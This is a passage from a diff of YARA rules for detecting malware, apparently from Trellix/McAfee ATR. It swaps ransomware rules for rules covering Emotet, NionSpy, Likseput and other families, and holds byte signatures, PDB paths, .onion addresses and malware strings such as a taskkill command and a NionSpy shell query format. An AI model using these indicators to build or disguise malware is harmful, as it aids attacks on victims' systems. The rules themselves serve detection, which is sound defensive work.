80F28C3660FEF8424200200000F298C24800000000F28C8660F72F00C660F72D114660FEBC80F28C1660FFEC20F298424A0000000660FEFE8660F38002DD02B42000F29AC24C00000000F28C5660FFEC30F29442460660FEFC10F28D8660F72F007660F72D319660FEBD80F295C245083E8010F8594FBFFFF0F297C24700F28BC24400200000F28AC24A0010000660FFEAC24D00000000F28A424C00100000F28DD660FFEA424F00000000F288C24B00100000F28D4660FFE8C24E00000000F288424D0010000660FFE8424A00000008B44242C8B7C2414660F62D9660F6AE90F28CB660F6AE0660F62D00F10068344241410660F6CCA660FEFC8660F6DDA0F110A0F10008B4424100F28CD660F6DEC660FEFD8660F6CCC0F28A424000200000F111883C0100F10078B7C2418660FFE642470660FEFC883442418100F28D4894424100F110F8B7C240C0F288C24F0010000660FFE8C24000100008344240C100F10078B7C241C8344241C10660FEFE80F28842430010000660FFE8424800000000F112F8B7C242C0F28AC24E0010000660FFE6C24500F28DD660F62D0660F62D9660F6AE90F28CB660F6AE00F104610660F6CCA660FEFC8660F6DDA0F114A100F1047100F28CD660F6DEC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFE80F11280F28AC2440010000660FFEFE660FFEAC24900000000F28A424600100000F28DD660FFEA424100100000F288C24500100000F28D4660FFE4C24600F28842470010000660FFE84242001000083442410108B4424108344241410660F62D98344241810660F6AE90F28CB660F6AE0660F62D00F1046208344240C10660F6CCA660FEFC88344241C100F114A200F104720660F6DDA0F28CD660FEFD8660F6CCC0F11188B44241483442414100F28DF660F6DEC0F28A424800100000F10008B442418660FFEA424C0000000660FEFC883442418100F28D40F11088B44240C0F288C2450020000660FFE8C24B00000008344240C100F10008B44241C660F62D9660FEFE8660F6AF90F288424900100000F28CB660FFE4424300F11288B442410660F62D083C010660F6AE00F1046308344241C10660F6CCA660FEFC8660F6DDA0F114A30894424100F1047300F28CF660F6DFC660FEFD8660F6CCC0F11188B4424140F10008B442418660FEFC80F11088B44240C0F10008B44241C660FEFF881442410D000000081C70001000081442418D000000081C2000100008144241CD000000081C60001000081442414D00000008144240CD00000000F288C24A00100000F289424B00100000F289C24C00100000F28A424D00100000F28AC24E00100000F28B424F00100000F11388B4424240F28BC24000200002D00010000836C242001897C242C8B7C2428894424240F85E2F6FFFFEB068B550C8B75088954241083F8400F829A010000C1E80689442420660F1F4400000F10370F1057100F107F200F106F3085C90F84F60000008BC10F1F80000000000F28DA660FFEDE660FEFEB660F38002DC02B42000F28E5660FFEE70F28C4660FEFC20F28C8660F72F00C660F72D114660FEFC80F28D1660FFED3660FEFEA660F70D293660F38002DD02B42000F28DD660F70ED4E660FFEDC660F70E3390F28C3660FEFC10F28C8660F72F007660F72D119660FEFC8660FFED1660FEFEA660F38002DC02B4200660FFEE50F28C4660FEFC10F28D8660F72F00C660F72D314660FEFD80F28C3660FFEC2660F70F039660FEFE8660F38002DD02B42000F28C5660F70ED4E660FFEC4660F70F8930F28C8660FEFCB0F28D1 } + $pdb = "\\Only\\Must\\Not\\And.pdb" + $pdb1 = "\\To\\Access\\Do.pdb" condition: - uint16(0)==0x5a4d and filesize <400KB and all of them + uint16(0)==0x5a4d and filesize <1440KB and any of them } -rule TRELLIX_ARC_Ransom_Win_Blackcat : RANSOMWARE FILE +rule TRELLIX_ARC_MALW_Emotet : FINANCIAL FILE { meta: - description = "Detecting variants of Windows BlackCat malware" - author = " Trellix ATR" - id = "65483ffb-6b10-5fd5-8a5f-fc885a5f2e98" - date = "2022-01-06" - modified = "2022-01-19" + description = "Rule to detect unpacked Emotet" + author = "Marc Rivero | McAfee ATR Team" + id = "5bc83065-dfdd-56b7-9983-200bff35c8b1" + date = "2020-07-21" + modified = "2020-08-14" reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Win_BlackCat_public.yar#L2-L24" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_emotet.yar#L1-L32" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "8faad28ab26690221f6e2130c886446615dbd505f76490cfaf999d130d0de6e3" + logic_hash = "223e4453a6c3b56b0bc0f91147fa55ea59582d64b8a5c08f1f8d06026044065e" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" - malware_type = "Ransomware" - detection_name = "Ransom_Win_BlackCat" + tags = "FINANCIAL, FILE" + rule_version = "v1" + malware_type = "financial" + malware_family = "Backdoor:W32/Emotet" + actor_type = "Cybercrime" + hash1 = "a6621c093047446e0e8ae104769af93a5a8ed147ab8865afaafbbd22adbd052d" + actor_type = "Cybercrime" actor_group = "Unknown" strings: - $URL1 = "zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide - $URL2 = "mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide - $API = { 3a 7c d8 3f } + $pattern_0 = { 8b45fc 8be5 5d c3 55 8bec } + $pattern_1 = { 3c39 7e13 3c61 7c04 3c7a 7e0b 3c41 } + $pattern_2 = { 7c04 3c39 7e13 3c61 7c04 3c7a 7e0b } + $pattern_3 = { 5f 8bc6 5e 5b 8be5 } + $pattern_4 = { 5f 668906 5e 5b } + $pattern_5 = { 3c30 7c04 3c39 7e13 3c61 7c04 } + $pattern_6 = { 53 56 57 8bfa 8bf1 } + $pattern_7 = { 3c39 7e13 3c61 7c04 3c7a 7e0b } + $pattern_8 = { 55 8bec 83ec14 53 } + $pattern_9 = { 5e 8be5 5d c3 55 8bec } condition: - uint16(0)==0x5a4d and filesize <3500KB and 1 of ($URL*) and $API + 7 of them and filesize <180224 } -rule TRELLIX_ARC_Purelocker_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Malw_Likseput_Backdoor_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect PureLocker ransomware based on binary sequences" + description = "Rule to detect Likseput backdoor based on the PDB" author = "Marc Rivero | McAfee ATR Team" - id = "3d945869-9faa-59de-add6-d664a7beef6f" - date = "2019-11-13" + id = "2193daf8-016b-5f49-97ec-b821c8da22f6" + date = "2011-03-26" modified = "2020-08-14" - reference = "https://www.pandasecurity.com/mediacenter/security/purelocker-ransomware-servers/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_PureLocker.yar#L1-L25" + reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_likseput.e" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_likseput_backdoor_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "9f39f0ef922023a79919f5b41a7acda6c08373af8f5fd2d4c4dcaca6146970ea" + hash = "993b36370854587f4eef3366562f01ab87bc4f7b88a21f07b44bd5051340386d" + logic_hash = "2afc4b7e6a5f0d9fed9a075aebaac8157e843c83c55c3f2255431bb6a03459ec" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/PureLocker" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Likseput" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $sequence = { 31??FF????E8????????83????5BC2????555357BA????????83????C7????????????4A75??E8????????8B????????????8D????E8????????8B????????????8D??????E8????????FF????8D??????????59E8????????75??FF??????8D??????????59E8????????75??EB??B8????????EB??31??21??74??31??0FBE??E9????????8D??????C7????????????C7????????????66??????????FF??????E8????????89??????52E8????????5A5052E8????????5A50FF??????E8????????8D????????????50E8????????8B??????01??89??????8B??????83????53E8????????89??????8B??????21??75??31??0FBE??E9????????68????????68????????FF????????????FF??????E8????????FF????E8????????89??01??89????????????8B????????????83????53E8????????89????????????8B????????????21??75??FF??????E8????????31??0FBE??E9????????68????????68????????FF??????FF????????????E8????????0FBE??????????83????0F85????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????FF??????E8????????68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF????????????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????FF????E8????????8D??????FF????E8????????FF????????????E8????????FF????????????E8????????B8????????0FBE??E9????????EB??68????????8D??????508D??????5068????????68????????68????????31??5068????????68????????FF??????FF????????????68????????E8????????89??????8B??????21??75??31??0FBE??E9????????8D??????508D??????FF????E8????????89????????????FF??????E8????????C7??????????????FF????????????E8????????C7????????????????????C7????????????????????8B????????????21??74??E9????????0FBE????????????83????75??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????EB??68????????68????????8D????????????5068????????8D??????FF????E8????????89??????8B??????21??74??E9????????0FBE????????????83????75??8D????????????8D????FF????FF??8F??????8F??????EB??8D????????????8B????9952508F??????8F??????FF??????FF??????5B5F83????7F??7C??83????77??31??EB??B8????????09??75??E9????????0FBE????????????83????75??68????????E8????????89????????????8B????????????21??75??E9????????68????????68????????68????????FF????????????FF????????????FF????????????8D??????FF????E8????????89????????????EB??68????????E8????????89??????8B??????21??75??E9????????68????????68????????FF??????8B????????????508D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????FF????FF??5B5F83????75??83????74??31??EB??B8????????09??74??E9????????EB??8B??????21??75??E9????????8B??????8B????21??75??E9????????0FBE????????????83????75??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????68????????FF????????????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??C7????????????????????FF????????????E8????????89????????????C7????????????????????68????????FF????????????FF????????????8B????????????FF????8D??????FF????E8????????89????????????8B????????????21??74??E9????????0FBE????????????83????75??8B????????????21??7E??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??8B??????21??7E??68????????68????????FF??????E8????????FF??????E8????????C7??????????????0FBE????????????83????75??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????EB??8B????????????21??75??E9????????8B????????????8D????89??21??75??E9????????8B??????83????53E8????????89????????????8B????????????21??75??E9????????68????????68????????FF??????FF????????????E8????????0FBE????????????83????75??68????????68????????FF??????FF????????????8B????????????8D????FF????FF??8D??????FF????E8????????89????????????EB??68????????FF??????FF????????????8B????????????FF????8D??????FF????E8????????89????????????FF????????????E8????????C7????????????????????0FBE????????????83????75??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????EB??68????????68????????FF????????????E8????????FF????????????E8????????C7????????????????????8B????????????21??74??EB??68????????8D??????FF????E8????????89????????????8B????????????21??74??EB??0FBE????????????83????75??68????????31??508D??????FF????E8????????C6????????8D??????FF????E8????????8D??????FF????E8????????0FBE??????0FBE??E9????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B????????????21??7E??FF????????????E8????????8B??????21??7E??FF??????E8????????8B????????????21??7E??FF????????????E8????????8D??????8B????21??7E??68????????8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????8D??????8B????21??7E??8D??????FF????E8????????31??0FBE??EB??31??FF????E8????????FF????????????E8????????FF??????E8????????81??????????5F5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????83????????????0F84????????FF????E8????????89??01??89??????8B??????83????53E8????????89??????83????????74??68????????68????????FF??????FF??????E8????????89??3B??????75??8B??????83????538D??????5866??????FF??????5866??????FF??????5889????FF??????????5889??????8D??????508D??????5068????????68????????FF??????89??21??75??FF??????5889??????FF??????E8????????8B??????EB??31??FF????E8????????83????5B5DC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????31??5050E8????????FF??????E8????????52E8????????5A50FF??????????8D??????????50E8????????8D??????50E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????8D??????50E8????????FF????8D??????????59E8????????74??52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????52E8????????5A5052E8????????5A50FF??????????8D??????????50E8????????E8????????01????E8????????588B??????52E8????????8D??????50E8????????EB??8B????52E8????????5A5052E8????????8B??????52E8????????8D??????50E8????????8B????52E8????????5A5052E8????????5850E8????????5A01??EB??E8????????66????????FF????E8????????FF??????E8????????83????C331??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????555331??50505050E8????????C7??????????????FF??????E8????????89????8B????21??75??31??EB??8D??????50FF??????FF??????68????????E8????????89??21??75??8B????FF????5889??????68????????68????????FF??????E8????????FF????E8????????8B??????EB??31??83????5B5DC35331??50505050E8????????8B??????8D????E8????????FF????E8????????89??????8B??????83????53E8????????89??????83????????74??68????????FF??????FF??????FF??????E8????????21??74??FF??????FF??????68????????E8????????89??F7??89??????FF??????E8????????8B??????EB??31??FF????E8????????83????5BC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????FF????8D??????????59E8????????74??31??E9????????52E8????????5A50FF??????????8D??????????50E8????????8B??????52E8????????8D??????50E8????????FF??????E8????????89??01??89??????8B??????83????53E8????????89??????83????????0F84????????68????????68????????FF??????FF??????E8????????89??3B??????0F85????????FF??????8D??????5866??????8B??????83????535866??????FF??????5889????C7??????????????8D??????????8D??????E8????????8D??????C7????????????C7????????????8D??????505889????68????????68????????8D??????508D??????5068????????8D??????50E8????????89??21??75??8B??????21??7E??B8????????EB??31??21??74??FF??????E8????????C7??????????????68????????68????????8D??????508D??????50FF??????E8????????89??21??75??8D??????FF????5889??????FF??????E8????????8B??????21??7E??FF??????E8????????8B??????EB??31??FF??????E8????????FF????E8????????83????5B5DC2????555357BA????????83????C7???????????? } + $pdb = "\\work\\code\\2008-7-8muma\\mywork\\winInet_winApplication2009-8-7\\mywork\\aaaaaaa\\Release\\aaaaaaa.pdb" condition: - uint16(0)==0x5a4d and filesize <300KB and all of them + uint16(0)==0x5a4d and filesize <40KB and any of them } -rule TRELLIX_ARC_Pico_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Nionspy : FILEINFECTOR FILE { meta: - description = "Rule to detect Pico Ransomware" + description = "Triggers on old and new variants of W32/NionSpy file infector" + author = "Trellix ARC Team" + id = "86051ef8-a18b-553c-b06c-490f8d6df5cf" + date = "2024-09-01" + modified = "2020-08-14" + reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_NionSpy.yar#L1-L25" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "982ba52f39352aee9e2d2dcadfb0816c439e92d0e5947afa7860630720913742" + score = 75 + quality = 70 + tags = "FILEINFECTOR, FILE" + malware_type = "fileinfector" + malware_family = "FileInfector:W32/NionSpy" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT" + $variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1" + $variant2013_string = "%s?cstorage=shell&comp=%s" + + condition: + uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and 1 of ($variant*) +} +rule TRELLIX_ARC_Dropper_Demekaf_Pdb : DROPPER FILE +{ + meta: + description = "Rule to detect Demekaf dropper based on PDB" author = "Marc Rivero | McAfee ATR Team" - id = "843cac7a-652e-5cbf-a09d-fb4b1eaa8481" - date = "2018-08-30" + id = "b49f42c1-d737-5afa-b547-7268e4cde360" + date = "2011-03-26" modified = "2020-08-14" - reference = "https://twitter.com/siri_urz/status/1035138577934557184" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Pico.yar#L1-L37" + reference = "https://v.virscan.org/Trojan-Dropper.Win32.Demekaf.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_dropper_demekaf_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "cc4a9e410d38a29d0b6c19e79223b270e3a1c326b79c03bec73840b37778bc06" - logic_hash = "bb15e66504f393bcb4b173cb2a4ec65aa13110060f7fb70282330b5f6d72f5ed" + hash = "fab320fceb38ba2c5398debdc828a413a41672ce9745afc0d348a0e96c5de56e" + logic_hash = "89c0c1da1f8997b12a446c93bbde200e62fac9cab2a9a17147b268d435bdc3b6" score = 75 - quality = 20 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "DROPPER, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Pico" + malware_type = "dropper" + malware_family = "Dropper:W32/Demekaf" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii - $s2 = "\\Downloads\\README.txt" fullword ascii - $s3 = "\\Music\\README.txt" fullword ascii - $s4 = "\\Videos\\README.txt" fullword ascii - $s5 = "\\Pictures\\README.txt" fullword ascii - $s6 = "\\Desktop\\README.txt" fullword ascii - $s7 = "\\Documents\\README.txt" fullword ascii - $s8 = "/c taskkill /im " fullword ascii - $s9 = "\\AppData\\Roaming\\" fullword ascii - $s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide - $s11 = "AppData\\Roaming" fullword ascii - $s12 = "\\Downloads" fullword ascii - $s13 = "operator co_await" fullword ascii + $pdb = "\\vc\\res\\fake1.19-jpg\\fake\\Release\\fake.pdb" condition: - ( uint16(0)==0x5a4d and filesize <700KB) and all of them + uint16(0)==0x5a4d and filesize <150KB and any of them } -import "pe" - -rule TRELLIX_ARC_Netwalker_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Malw_Browser_Fox_Adware : ADWARE FILE { meta: - description = "Rule to detect Netwalker ransomware" - author = "McAfee ATR Team" - id = "6fe75a64-77b8-5cb8-9365-a5336d4d1617" - date = "2020-03-30" - modified = "2020-11-20" - reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L3-L28" + description = "Rule to detect Browser Fox Adware based on the PDB reference" + author = "Marc Rivero | McAfee ATR Team" + id = "67d20c3a-4e9d-5fbf-b26a-d7b5fb270d12" + date = "2015-01-15" + modified = "2020-08-14" + reference = "https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Browse%20Fox.aspx" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_browser_fox_adware.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "11da4b57f8d9ed1fdf053053a51870af2cbf4062cc1340087ee70c3e92a1baf6" + hash = "c6f3d6024339940896dd18f32064c0773d51f0261ecbee8b0534fdd9a149ac64" + logic_hash = "462a05de46ec0d710cac80a05d4935279a43f49cbd5ef49c072f277982a76fce" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "ADWARE, FILE" rule_version = "v1" - malware_type = "ransomware" - note = "The rule doesn't detect the samples packed with UPX" + malware_type = "adware" + malware_family = "Adware:W32/BrowserFox" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $pattern = { 8B????8B????89??C7????????????EB??8B????52E8????????83????8B????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCC558B??83????C7????????????83??????74??83??????72??83??????75??8B????E9????????C7????????????8B????33??B9????????F7??83????89????8B????8B????8D????51E8????????83????89????83??????0F84????????C7????????????C7????????????C6??????C6??????C6??????8B????3B????0F84????????8B????2B????39????73??8B????89????EB??8B????2B????89????8B????89????C7????????????8B????03????8B????2B??89????74??83??????7E??83??????7D??C7????????????8B????03????89????8B????518B????03????528B????03????50E8????????83????8B????03????89????83??????75??6A??8D????528B????03????50E8????????83????8B????83????89????8B????03????89????E9????????8B????8B????89??83??????74??8B????52E8????????83????8B????89??C7????????????8B????8B??5DC3CCCCCCCC558B??51B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????81????????????75??8B????83????89????C7????????????EB??C7????????????B9????????6B????8B????0FB6????BA????????C1????8B????0FB6????C1????0B??B8????????D1??8B????0FB6????C1????0B??BA????????6B????8B????0FB6????C1????0B??BA????????C1????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FBE????BA????????C1????8B????0FBE????C1????0B??B8????????D1??8B????0FBE????C1????0B??BA????????6B????8B????0FBE????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????D1??8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????6B????8B????89????8B??5DC3CCCCCC558B??B8????????6B????8B????C7????????????B8????????6B????8B????C7????????????B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????5DC3CCCCCC558B??83????83??????75??E9????????8B????508D????51E8????????83????BA????????6B????8B????8B????83????B8????????6B????8B????89????B9????????6B????8B????83??????75??B9????????6B????8B????8B????83????BA????????6B????8B????89????83??????77??C7????????????EB??8B????83????89????8B????3B????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??EB??C7????????????EB??8B????83????89????83??????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??8B????83????89????8B????83????89????8B????83????89????E9????????8B??5DC3CCCCCCCCCCCCCCCC558B??83????C7????????????EB??8B????83????89????83??????7D??8B????8B????8B????8B????89??????EB??C7????????????EB??8B????83????89????83??????0F8E????????B9????????6B????B8????????C1????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????C1????BA????????C1????8B??????33??????C1????B9????????C1????BA????????C1????8B??????33??????C1????0B??BA????????C1????89??????B8????????6B????BA????????C1????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????C1????BA????????6B????8B??????03??????BA????????C1????89??????B8????????C1????B9????????C1????8B??????33??????C1????B8????????C1????B9????????C1????8B??????33??????C1????0B??B9????????C1????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????6B????B8????????C1????8B??????33??????C1????BA????????6B????BA????????C1????8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????C1????B9????????6B????8B??????03??????B9????????C1????89??????BA????????6B????B9????????C1????8B??????33??????C1????B8????????6B????B8????????C1????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B????B9????????6B????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????D1??BA????????6B????8B??????03??????BA????????D1??89??????B8????????6B????BA????????D1??8B??????33??????C1????B9????????6B????B9????????D1??8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????D1??B8????????6B????8B??????03??????B8????????D1??89??????B9????????6B????B8????????D1??8B??????33??????C1????BA????????6B????BA????????D1??8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B???? } - $pattern2 = { CCCCCCCCCCA1????????C3CCCCCCCCCCCCCCCCCCCC538B??????5533??5785??74??8B??????85??74??8B????85??74??C1????50E8????????83????89??85??74??8B????5633??85??74??5653E8????????83????85??74??8B????85??74??8D??????89??????5150E8????????83????85??74??8B????8B??8B??????89????FF????8B????463B??72??39????B9????????5E0F44??5F8B??5D5BC35F5D33??5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC535556578B??????85??74??83????74??8B????85??74??8B??????85??74??33??85??74??8B??????660F1F??????85??74??8B??53FF????E8????????EB??E8????????8D????8B??FF????8B??53FF??83????85??75??463B????72??5F5E5D33??5BC35F5E5DB8????????5BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC6A??FF??????FF??????E8????????83????C3CCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??56E8????????8B????50E8????????83????85??75??A1????????6A??83????5650E8????????83????85??75??56E8????????83????85??74??8D????66??????74??83????83????75??33??5EC383????74??A1????????6A??83????5150E8????????83????85??74??B8????????5EC3CCCCCCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????5674??A1????????83??????74??8B??????85??74??56E8????????8B??????????83????83????75??83??????74??66????????75??0FB7??83????72??83????76??83????66??????76??6A??8D????5650E8????????83????85??74??B8????????5EC333??5EC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??A1????????83????????????74??8B??????85??74??6A??05????????5150E8????????83????85??74??B8????????C333??C3CCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????74??8B??????85??74??A1????????83??????74??6A??83????5150E8????????83????85??74??B8????????C333??C3CCCCCCCCCCCCCCCC83????????????5674??8B??????85??74??A1????????83??????74??51E8????????8B??83????85??74??8B??????????6A??83????5651E8????????83????85??74??B8????????5EC356E8????????83????33??5EC3CCCCCCCCCCCCCC535556576A??E8????????8B??83????85??0F84????????8B??660F1F??????0FB7????83????51E8????????8B??83????85??74??0FB7????51FF????57E8????????83????83????????????74??A1????????83??????74??6A??83????5750E8????????83????85??74??E8????????8B????3B????74??6A??51E8????????8B??83????85??74??E8????????6A??538B????FF??E8????????538B??????????FF??57E8????????83????8B??03??85??0F85????????55E8????????83????E8????????6A??8B??????????FF??E9????????CCCCCCCCCCCCCC83????5533??565739??????????0F84????????8B?????